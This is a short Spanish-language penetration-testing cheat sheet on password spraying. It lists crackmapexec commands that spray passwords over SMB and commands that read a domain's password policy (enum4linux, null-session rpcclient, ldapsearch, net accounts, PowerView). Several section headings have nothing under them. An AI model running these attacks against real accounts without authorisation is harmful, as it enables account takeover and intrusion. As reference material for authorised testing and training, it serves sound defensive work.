Password Spraying
Qué es?
Comandos
Crackmapexe
crackmapexec smb 192.168.1.101 -u user1 user2 user3 -p Summer18
crackmapexec smb 192.168.1.101 -u user1 -p password1 password2 password3
crackmapexec smb 192.168.1.101 -u /path/to/users.txt -p Summer18
crackmapexec smb 192.168.1.101 -u Administrator -p /path/to/passwords.txtPolítica de contraseñas
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
enum4linux -u 'username' -p 'password' -P <IP>
rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
# From Windows
net accounts
(Get-DomainPolicy)."SystemAccess" #From powerviewKerbrute - Linux
Metasploit

Rubeus - Windows
DomainPasswordSpray - windows
Referencias
Última actualización